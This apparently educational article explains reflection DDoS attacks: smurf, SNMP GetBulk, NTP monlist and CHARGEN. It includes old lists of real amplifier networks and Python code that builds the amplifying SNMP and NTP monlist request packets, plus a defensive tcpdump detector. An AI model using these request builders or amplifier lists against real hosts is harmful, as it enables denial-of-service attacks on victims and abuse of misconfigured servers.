Distributed Reflection Denial of Service (DrDoS) attacks are chipping away at the foundation of the internet. Attackers sell or rent DoSnets for as little as $5 to take down just about any website. Let's have a look at some of the biggest problems.
DDoS attacks in which a few thousand infected Windows PCs SYN flood a network have taken a back seat to the next generation of denial of service attacks, Distributed Reflection Denial of Service (DrDoS). A packet kiddie no longer needs to compromise servers and PCs to launch an attack: the traffic is bounced off legitimate but misconfigured servers, and most of the administrators of those servers have no idea they are taking part. Reflection is nothing new to network security; you may have heard of the original amplification attack, "smurf". In a smurf attack, large numbers of ICMP echo requests carrying the intended victim's spoofed source IP are sent to a network's IP broadcast address. By default most hosts on that network reply, and every reply goes to the spoofed source address, so one request becomes hundreds of replies aimed at the victim. The attack was devastating enough that several non-profit efforts sprang up to raise awareness of the problem; one in particular, netscan.org, listed over 122,945 misconfigured networks that would answer a spoofed ICMP echo request when it launched. By 2005 the number was down to a few thousand, with only a handful of replies from each network.
Here is a snapshot of what the internet looked like in early 2000. The listing below shows each broadcast address and the number of replies it returned to a single ping request (the contact e-mail column of the original listing is empty in this copy):
Last rescan: Thu Feb 24 10:15:39 PST 2000

  RESP  ADDR             EMAIL ADDRESSES
-----------------------------------------
124273  208.158.191.0
 27545  210.45.224.255
 12501  193.76.71.0
 10679  202.178.229.0
 10483  200.255.9.0
  9818  210.72.81.0
  9617  207.34.70.0
  8176  207.112.112.0
  7222  207.112.112.255
  6681  206.130.55.0
  6316  206.130.55.255
  6003  210.243.91.255
  5358  208.192.16.255
  4658  209.132.220.255
  4413  206.144.34.255
  4207  206.144.35.255
  3146  207.34.70.255
  2418  170.118.254.0
  2416  170.118.254.255
And a snapshot as of today from Powertech.no, which has kept Netscan's operation going:
Current top ten smurf amplifiers (updated every 5 minutes)
(last update: 2015-08-09 20:01:02 CET)

Network           #Dups  #Incidents  Registered at      Home AS
212.1.130.0/24       38           0  1999-02-20 09:41   AS9105
204.158.83.0/24      27           0  1999-02-20 10:09   AS3354
209.241.162.0/24     27           0  1999-02-20 08:51   AS701
159.14.24.0/24       20           0  1999-02-20 09:39   AS2914
192.220.134.0/24     19           0  1999-02-20 09:38   AS685
204.193.121.0/24     19           0  1999-02-20 08:54   AS701
198.253.187.0/24     16           0  1999-02-20 09:34   AS22
164.106.163.0/24     14           0  1999-02-20 10:11   AS7066
12.17.161.0/24       13           0  2000-11-29 19:05   not-analyzed
199.98.24.0/24       13           0  1999-02-18 11:09   AS6199
Netscan offered a script that counted how many times x.y.z.0 and x.y.z.255 reply to a single ping packet. If either number is greater than 1, the network is misconfigured (a router is forwarding directed broadcasts) and its administrator should be notified. Networks replying more than 10 times per ping were the ones that ended up on the smurf amplifier lists attackers traded. Netscan shut its doors after helping to cut the number of networks available for abuse in smurf attacks. Some organisations criticised Netscan for publishing the lists of networks being used in attacks (an attacker could simply copy the vulnerable networks into a list and use them in an attack), but they will always be remembered as the ones who saved the internet.
In today's world there is a whole new set of protocols that can be abused in reflection attacks. The bandwidth amplification factor (BAF) is the size of the reply a reflector sends to the victim divided by the size of the request the attacker had to send. A 2015 snapshot of protocols and their amplification factors:

UDP-based amplification attacks

Protocol                 Bandwidth amplification factor
NTP                      556.9
CharGEN                  358.8
DNS                      up to 179
QOTD                     140.3
Quake Network Protocol   63.9
SSDP                     30.8
Kad                      16.3
SNMPv2                   6.3
Steam Protocol           5.5
NetBIOS                  3.8
BitTorrent               3.8

Nobody publishes public lists of abusable hosts the way Netscan did these days, as doing so could invite lawsuits or prosecution now that denial of service attacks are no longer taken lightly, and a public list is as useful to an attacker as it is to a defender.
DNS amplification attacks:
Simple Network Management Protocol (SNMP) DrDoS attacks
SNMP operates at layer seven (the application layer) and is used to monitor and manage devices such as routers, switches, VoIP and video systems. It exposes data about the devices it has records for and can also be used to configure some of them. SNMP has three parts: the managed device; the agent, a software module running on the device that collects the information; and the management software (the manager, or NMS), which does just what you would think, polling the agents and keeping records for every device it manages.
SNMP uses UDP port 161 for requests and responses and UDP port 162 for unsolicited notifications, or "traps". There are three versions, v1, v2c and v3; v2 and v3 added two protocol data units, GetBulkRequest and InformRequest. Because SNMP runs over UDP, a connectionless protocol with no handshake, the source IP address can be spoofed.
The DrDoS attack starts with the attacker scanning the internet for SNMP hosts and their community strings (very often the default "public"). With that information the attacker sends a GetBulkRequest of around 100 bytes, and the response from the SNMP agent is around 400 bytes, an amplification ratio of about 1:4. GetBulkRequest carries a max-repetitions field that tells the agent how many rows to return, so by asking for the whole Management Information Base (MIB) in one request the attacker can push the ratio to around 1:7, making SNMP far more efficient for DrDoS.
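To make the size arithmetic concrete, here is an added example (not code from the original post) that BER-encodes an SNMPv2c GetBulkRequest and decodes the variable bindings out of a response. The community string "public", the OID 1.3.6.1.2.1 and the response, which is constructed rather than captured, are assumptions for illustration; the request builder itself produces a valid v2c message.

```python
"""SNMPv2c GetBulkRequest encoder and response decoder (added example, not from the post)."""

# --- minimal BER, the encoding SNMP uses ------------------------------------
def ber_len(n):
    """Length octets: short form below 128, long form (0x80|N, then N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, value):
    return bytes([tag]) + ber_len(len(value)) + value

def ber_int(v):
    """INTEGER in minimal two's-complement form (200 needs two bytes: 00 C8)."""
    n = 1
    while not -(1 << (8 * n - 1)) <= v < (1 << (8 * n - 1)):
        n += 1
    return tlv(0x02, v.to_bytes(n, "big", signed=True))

def ber_oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7f]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7f))
            arc >>= 7
        out += bytes(reversed(chunk))
    return tlv(0x06, bytes(out))

def ber_parse(data):
    """Split one TLV off the front of data: (tag, value, remainder)."""
    tag, n, i = data[0], data[1], 2
    if n & 0x80:
        k = n & 0x7f
        n, i = int.from_bytes(data[2:2 + k], "big"), 2 + k
    return tag, data[i:i + n], data[i + n:]

# --- SNMP messages ------------------------------------------------------------
GETBULK, GETRESPONSE = 0xA5, 0xA2   # context-specific PDU tags
SNMP_V2C = 1                        # version field value for v2c

def getbulk_request(community, oids, max_repetitions, request_id=1, non_repeaters=0):
    """The attack lever is max_repetitions: a few dozen request bytes ask the
    agent for that many rows of every listed subtree."""
    varbinds = b"".join(tlv(0x30, ber_oid(o) + b"\x05\x00") for o in oids)  # OID + NULL
    pdu = tlv(GETBULK, ber_int(request_id) + ber_int(non_repeaters)
              + ber_int(max_repetitions) + tlv(0x30, varbinds))
    return tlv(0x30, ber_int(SNMP_V2C) + tlv(0x04, community.encode()) + pdu)

def count_varbinds(message):
    """Number of variable bindings in any SNMPv2c message (request or response)."""
    _, msg, _ = ber_parse(message)      # outer SEQUENCE
    _, _, rest = ber_parse(msg)         # version
    _, _, rest = ber_parse(rest)        # community
    _, pdu, _ = ber_parse(rest)         # PDU
    for _ in range(3):                  # request-id, then the two status/repetition ints
        _, _, pdu = ber_parse(pdu)
    _, vbl, _ = ber_parse(pdu)          # VarBindList
    n = 0
    while vbl:
        _, _, vbl = ber_parse(vbl)
        n += 1
    return n

def constructed_response(request_id, rows, value=b"x" * 40):
    """Constructed (not captured) GetResponse with `rows` string-valued bindings."""
    vb = tlv(0x30, ber_oid("1.3.6.1.2.1.1.1.0") + tlv(0x04, value))
    pdu = tlv(GETRESPONSE, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, vb * rows))
    return tlv(0x30, ber_int(SNMP_V2C) + tlv(0x04, b"public") + pdu)

if __name__ == "__main__":
    req = getbulk_request("public", ["1.3.6.1.2.1"], max_repetitions=200)
    resp = constructed_response(1, rows=50)
    print("request :", len(req), "bytes", req.hex())
    print("response:", len(resp), "bytes,", count_varbinds(resp), "varbinds,",
          f"amplification {len(resp) / len(req):.1f}x")
```

Run stand-alone it prints a 38-byte request asking for 200 rows of the MIB-2 subtree, then the size of a constructed 50-row reply and the resulting ratio. To test a device of your own, send the request bytes in a UDP datagram to port 161 from outside your network: any answer to a guessed community string means that device will reflect for anyone.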
Network Time Protocol (NTP) DrDoS attacks
NTP uses UDP port 123 to synchronise computer clocks between sets of clients and servers. Attackers scan the internet and build a database of NTP servers that answer queries from anyone (they should be restricted with ACLs, for example ntpd's "restrict default noquery"). The attacker then sends a mode 7 request for "monlist", a private monitoring command in ntpd that returns the addresses of up to the last 600 clients the server has talked to. Mode 7 is reserved for implementation-specific use rather than defined by the NTP RFC, and the reference client (ntpdc) pads its requests to a fixed length, which keeps request and response sizes more even. Attackers strip that padding and send only the 8-byte mode 7 header. On the wire that request is 60 bytes (the minimum Ethernet frame, since 8 bytes of payload plus 42 bytes of Ethernet, IP and UDP headers is only 50), while the response returned 2,604 bytes, giving this attack a whopping reflection multiplier of 43:1.
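As an added example (not from the original post), the code below builds the stripped 8-byte mode 7 monlist request, parses a mode 7 reply, pulls the client addresses out of it, and computes the amplification factor both at the payload level and on the wire. The reply is constructed, not captured; the 42-byte Ethernet/IP/UDP overhead and 60-byte minimum frame are the assumptions behind the on-wire figure. The header layout, implementation number 3, request code 42 and the 72-byte entry size are ntpd's.

```python
"""ntpd mode 7 "monlist" request builder and reply parser (added example, not from the post)."""
import socket
import struct

# ntpd's private mode 7 header (8 bytes):
#   byte 0: R(1) M(1) VN(3) Mode(3)    byte 1: A(1) Seq(7)
#   byte 2: implementation             byte 3: request code
#   bytes 4-5: Err(4) Count(12)        bytes 6-7: MBZ(4) ItemSize(12)
IMPL_XNTPD = 3          # implementation number used by ntpd
REQ_MON_GETLIST_1 = 42  # request code for "monlist"
MON_ENTRY_SIZE = 72     # one info_monitor_1 entry in the reply
ETH_IP_UDP_HDR = 42     # Ethernet + IPv4 + UDP headers (assumption for on-wire sizes)
MIN_FRAME = 60          # minimum Ethernet frame without FCS

def monlist_request(version=2):
    """The stripped 8-byte request: header only, none of ntpdc's padding."""
    first = (version << 3) | 7                       # R=0, M=0, VN=version, mode 7
    return struct.pack("!BBBBHH", first, 0, IMPL_XNTPD, REQ_MON_GETLIST_1, 0, 0)

def parse_mode7(packet):
    """Decode a mode 7 packet into its header fields and fixed-size data items."""
    if len(packet) < 8:
        raise ValueError("mode 7 packet shorter than its header")
    b0, b1, impl, code, err_count, mbz_size = struct.unpack("!BBBBHH", packet[:8])
    hdr = {
        "response": bool(b0 & 0x80), "more": bool(b0 & 0x40),
        "version": (b0 >> 3) & 0x7, "mode": b0 & 0x7,
        "sequence": b1 & 0x7f, "implementation": impl, "request_code": code,
        "err": err_count >> 12, "count": err_count & 0x0fff,
        "item_size": mbz_size & 0x0fff,
    }
    size, body = hdr["item_size"], packet[8:]
    hdr["items"] = [body[i * size:(i + 1) * size] for i in range(hdr["count"])] if size else []
    return hdr

def monlist_clients(packet):
    """Client IPv4 addresses in a monlist reply (offset 16 of each 72-byte entry)."""
    return [socket.inet_ntoa(item[16:20]) for item in parse_mode7(packet)["items"]
            if len(item) >= 20]

def amplification(request, responses, on_wire=False):
    """Bandwidth amplification factor: response bytes divided by request bytes.
    on_wire=True adds the link/IP/UDP headers and applies the minimum frame size."""
    size = (lambda p: max(MIN_FRAME, ETH_IP_UDP_HDR + len(p))) if on_wire else len
    return sum(size(r) for r in responses) / size(request)

def constructed_monlist_reply(seq, clients, more):
    """Constructed (not captured) reply carrying one 72-byte entry per client."""
    first = 0x80 | (0x40 if more else 0) | (2 << 3) | 7    # R=1, M=more, VN=2, mode 7
    hdr = struct.pack("!BBBBHH", first, seq & 0x7f, IMPL_XNTPD, REQ_MON_GETLIST_1,
                      len(clients) & 0x0fff, MON_ENTRY_SIZE)
    items = b"".join((bytes(16) + socket.inet_aton(c)).ljust(MON_ENTRY_SIZE, b"\0")
                     for c in clients)
    return hdr + items

if __name__ == "__main__":
    req = monlist_request()
    # six replies of six entries each, as ntpd chunks a monlist answer
    replies = [constructed_monlist_reply(i, [f"203.0.113.{6 * i + j}" for j in range(6)], i < 5)
               for i in range(6)]
    print("request:", req.hex(), f"({len(req)} bytes)")
    print("clients in first reply:", monlist_clients(replies[0]))
    print(f"BAF payload {amplification(req, replies):.1f}, "
          f"on wire {amplification(req, replies, on_wire=True):.1f}")
```

The payload-level factor is what the table above measures; the on-wire factor is lower because every reply packet pays its own 42 bytes of headers while the tiny request is padded up to 60 bytes. Pointed at a real server, the same parser tells you whether the "response" bit comes back set, which is all a scanner needs to add the host to an amplifier list.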
Character Generator Protocol (CHARGEN) DrDoS attacks
CHARGEN runs over both TCP and UDP. The TCP service cannot be used for amplification because TCP is connection-oriented: the three-way handshake has to complete before any data flows, so a spoofed source address never gets that far. The UDP service listens on port 19 and, for every datagram it receives, answers with a random number of characters between zero and 512. The attacker therefore cannot count on amplification for every single request, but on average the reply is far bigger than the request; open source estimates put the average reflection multiplier at about 17.
Here is an actual example of what a CHARGEN attack looks like in a packet capture (tcpdump output):
2015-04-16 06:17:16.392098 IP 180.189.3.34.61997 > 192.168.1.103.9315: UDP, length 443
.>..E...26..q......"....-$c..w
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk
%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl
2015-04-16 06:17:16.393881 IP 180.189.3.34.61997 > 192.168.1.103.9315: UDP, length 443
.>..E...27..q......"....-$c..w
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk
%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl
2015-04-16 06:17:16.398694 IP 180.189.3.34.61997 > 192.168.1.103.9315: UDP, length 443
.>..E...2<..q......"....-$c..w
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk
%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl
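Added example, not from the original post: a small detector that reads tcpdump output in the format shown above, flags UDP packets that arrive from well-known reflector ports or that carry CHARGEN's rotating character pattern regardless of port, and totals what each victim address is receiving. The sample capture is constructed with documentation addresses; the port-to-protocol table and the trusted-server exemption are assumptions, since legitimate replies from your own resolvers and NTP servers look identical at this level.

```python
"""Flag likely UDP reflection traffic in tcpdump -A style output (added example)."""
import re
from collections import defaultdict

# UDP source ports of the reflector services discussed on this page (assumed well-known ports)
REFLECTOR_PORTS = {19: "CHARGEN", 53: "DNS", 123: "NTP", 161: "SNMP", 1900: "SSDP", 17: "QOTD"}

# CHARGEN emits the printable ASCII set as a rotating 72-column pattern, so a run of
# consecutive printable characters in the payload identifies it whatever port it came from.
CHARGEN_RUN = re.compile(r"0123456789:;<=>\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ")

# "2015-04-16 06:17:16.392098 IP 1.2.3.4.19 > 5.6.7.8.9315: UDP, length 443"
SUMMARY = re.compile(
    r"^(?P<ts>\S+ \S+) IP (?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): UDP, length (?P<len>\d+)"
)

def parse_tcpdump(text):
    """Return (src, sport, dst, dport, length, payload_text) per packet."""
    pkts = []
    for line in text.splitlines():
        m = SUMMARY.match(line)
        if m:
            pkts.append([m["src"], int(m["sport"]), m["dst"], int(m["dport"]), int(m["len"]), ""])
        elif pkts:                      # continuation lines are the -A payload dump
            pkts[-1][5] += line + "\n"
    return [tuple(p) for p in pkts]

def classify(pkt, trusted=frozenset()):
    """Protocol label if the packet looks like reflected traffic, else None."""
    src, sport, dst, dport, length, payload = pkt
    if src in trusted:                  # servers we legitimately talk to
        return None
    if CHARGEN_RUN.search(payload):     # payload signature beats the port
        return "CHARGEN"
    return REFLECTOR_PORTS.get(sport)

def reflection_report(text, trusted=frozenset()):
    """Per-victim totals: packets, bytes, distinct reflectors and protocols seen."""
    report = defaultdict(lambda: {"packets": 0, "bytes": 0, "reflectors": set(), "protocols": set()})
    for pkt in parse_tcpdump(text):
        label = classify(pkt, trusted)
        if label is None:
            continue
        entry = report[pkt[2]]
        entry["packets"] += 1
        entry["bytes"] += pkt[4]
        entry["reflectors"].add(pkt[0])
        entry["protocols"].add(label)
    return dict(report)

# Constructed sample capture (documentation addresses), not a real one.
SAMPLE = """\
2015-04-16 06:17:16.392098 IP 203.0.113.34.19 > 192.0.2.10.9315: UDP, length 443
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefgh
"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghi
2015-04-16 06:17:16.393881 IP 203.0.113.35.61997 > 192.0.2.10.9315: UDP, length 443
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefgh
2015-04-16 06:17:16.398694 IP 198.51.100.7.123 > 192.0.2.10.9315: UDP, length 440
2015-04-16 06:17:16.401000 IP 198.51.100.53.53 > 192.0.2.10.40123: UDP, length 80
"""

if __name__ == "__main__":
    for victim, stats in reflection_report(SAMPLE, trusted={"198.51.100.53"}).items():
        print(victim, stats["packets"], "pkts", stats["bytes"], "bytes from",
              len(stats["reflectors"]), "reflectors:", sorted(stats["protocols"]))
```

In the sample the second CHARGEN packet comes from a high port, like the real capture above, and is still caught by its payload; the DNS reply from the trusted resolver is ignored. Run against a live capture (tcpdump -nn -A udp), the useful signal is many distinct reflectors all hitting the same destination port on one host within a second or two.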
In the wild there have been reports of NTP DoSnets attacking at over 100 Gbps, SNMP DoSnets capable of 40 Gbps, DNS attacks at 10 Gbps and CHARGEN DoSnets at about 20 Mbps. If one attacker or group of attackers could leverage all of these types of attack at the same time it would be devastating to virtually any server on the net. Right now you can buy or rent these DoSnets on underground forums and IRC channels for as little as $5 for a 30-minute attack.